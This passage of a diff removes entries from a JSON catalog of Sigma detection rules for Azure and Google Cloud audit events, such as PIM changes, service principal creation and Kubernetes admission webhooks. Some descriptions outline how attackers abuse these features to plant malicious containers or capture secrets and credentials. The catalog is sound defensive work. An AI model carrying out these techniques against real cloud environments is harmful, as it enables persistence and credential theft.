"https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", - "value": "Azure Virtual Network Device Modified or Deleted" - }, - { - "description": "Identifies when a new cloudshell is created inside of Azure portal.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/21", - "falsepositive": [ - "A new cloudshell may be created by a system administrator." - ], - "filename": "azure_new_cloudshell_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", - "value": "Azure New CloudShell Created" - }, - { - "description": "Identifies when a owner is was removed from a application or service principal in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Owner being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_owner_removed_from_application_or_service_principal.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", - "value": "Azure Owner Removed From Application or Service Principal" - }, - { - "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/09", - "falsepositive": [ - "Actual admin using PIM." - ], - "filename": "azure_pim_activation_approve_deny.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", - "value": "PIM Approvals And Deny Elevation" - }, - { - "description": "Detects when PIM alerts are set to disabled.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/09", - "falsepositive": [ - "Administrator disabling PIM alerts as an active choice." - ], - "filename": "azure_pim_alerts_disabled.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1484" - ] - }, - "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", - "value": "PIM Alert Setting Changes To Disabled" - }, - { - "description": "Detects when changes are made to PIM roles", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/09", - "falsepositive": [ - "Legit administrative PIM setting configuration changes" - ], - "filename": "azure_pim_change_settings.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", - "value": "Changes To PIM Settings" - }, - { - "description": "Detects when a user is added to a privileged role.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/06", - "falsepositive": [ - "Legtimate administrator actions of adding members from a role" - ], - "filename": "azure_priviledged_role_assignment_add.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", - "value": "User Added To Privilege Role" - }, - { - "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/05", - "falsepositive": [ - "Legtimate administrator actions of removing members from a role" - ], - "filename": "azure_priviledged_role_assignment_bulk_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", - "value": "Bulk Deletion Changes To Privileged Account Permissions" - }, - { - "description": "Detects when a new admin is created.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", - "creation_date": "2022/08/11", - "falsepositive": [ - "A legitimate new admin account being created" - ], - "filename": "azure_privileged_account_creation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", - "value": "Privileged Account Creation" - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "meta": { - "author": "sawwinnnaung", - "creation_date": "2020/05/07", - "falsepositive": [ - "Valid change" - ], - "filename": "azure_rare_operations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" - ], - "tags": [ - "attack.t1003" - ] - }, - "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", - "value": "Rare Subscription-level Operations In Azure" - }, - { - "description": "Identifies when a service principal is created in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/02", - "falsepositive": [ - "Service principal being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_service_principal_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", - "value": "Azure Service Principal Created" - }, - { - "description": "Identifies when a service principal was removed in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Service principal being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_service_principal_removed.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", - "value": "Azure Service Principal Removed" - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/26", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", - "value": "Azure Subscription Permission Elevation Via ActivityLogs" - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/26", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", - "value": "Azure Subscription Permission Elevation Via AuditLogs" - }, - { - "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "Suppression Rule being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_suppression_rule_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", - "value": "Azure Suppression Rule Created" - }, - { - "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/10", - "falsepositive": [ - "Administrator adding a legitmate temporary access pass" - ], - "filename": "azure_tap_added.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", - "value": "Temporary Access Pass Added To An Account" - }, - { - "description": "Detects when there is a interruption in the authentication process.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_unusual_authentication_interruption.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "8366030e-7216-476b-9927-271d79f13cf3", - "value": "Azure Unusual Authentication Interruption" - }, - { - "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/06/30", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", - "value": "Users Authenticating To Other Azure AD Tenants" - }, - { - "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_user_login_blocked_by_conditional_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", - "value": "User Access Blocked by Azure Conditional Access" - }, - { - "description": "Detect when a user has reset their password in Azure AD", - "meta": { - "author": "YochanaHenderson, '@Yochana-H'", - "creation_date": "2022/08/03", - "falsepositive": [ - "If this was approved by System Administrator or confirmed user action." - ], - "filename": "azure_user_password_change.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", - "value": "Password Reset By User Account" - }, - { - "description": "Identifies when a Virtual Network is modified or deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_virtual_network_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", - "value": "Azure Virtual Network Modified or Deleted" - }, - { - "description": "Identifies when a VPN connection is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_vpn_connection_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", - "value": "Azure VPN Connection Modified or Deleted" - }, - { - "description": "Detects when storage bucket is enumerated in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_bucket_enumeration.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" - ], - "tags": [ - "attack.discovery" - ] - }, - "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", - "value": "Google Cloud Storage Buckets Enumeration" - }, - { - "description": "Detects when storage bucket is modified or deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_bucket_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", - "value": "Google Cloud Storage Buckets Modified or Deleted" - }, - { - "description": "Identifies when sensitive information is re-identified in google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "gcp_dlp_re_identifies_sensitive_information.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565" - ] - }, - "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", - "value": "Google Cloud Re-identifies Sensitive Information" - }, - { - "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "gcp_dns_zone_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/dns/docs/reference/v1/managedZones", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", - "value": "Google Cloud DNS Zone Modified or Deleted" - }, - { - "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/13", - "falsepositive": [ - "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", - "Exceptions can be added to this rule to filter expected behavior." - ], - "filename": "gcp_firewall_rule_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", - "value": "Google Cloud Firewall Modified or Deleted" - }, - { - "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/13", - "falsepositive": [ - "Full Network Packet Capture may be done by a system or network administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_full_network_traffic_packet_capture.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074" - ] - }, - "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", - "value": "Google Full Network Traffic Packet Capture" - }, - { - "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/25", - "falsepositive": [ - "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_kubernetes_admission_controller.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ] - }, - "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", - "value": "Google Cloud Kubernetes Admission Controller" - }, - { - "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/22", - "falsepositive": [ - "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_kubernetes_cronjob.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ] - }, - "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", - "value": "Google Cloud Kubernetes CronJob" - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/09", - "falsepositive": [ - "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_kubernetes_rolebinding.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1267", - "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", - "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", - "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", - "value": "Google Cloud Kubernetes RoleBinding" - }, - { - "description": "Identifies when the Secrets are Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/09", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", - "value": "Google Cloud Kubernetes Secrets Modified or Deleted" - }, - { - "description": "Identifies when a service account is disabled or deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_service_account_disabled_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ] - }, - "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", - "value": "Google Cloud Service Account Disabled or Deleted" - }, - { - "description": "Identifies when a service account is modified in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_service_account_modified.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", - "value": "Google Cloud Service Account Modified" - }, - { - "description": "Detect when a Cloud SQL DB has been modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/15", - "falsepositive": [ - "SQL Database being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_sql_database_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", - "value": "Google Cloud SQL Database Modified or Deleted" - }, - { - "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/16", - "falsepositive": [ - "VPN Tunnel being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" - ], - 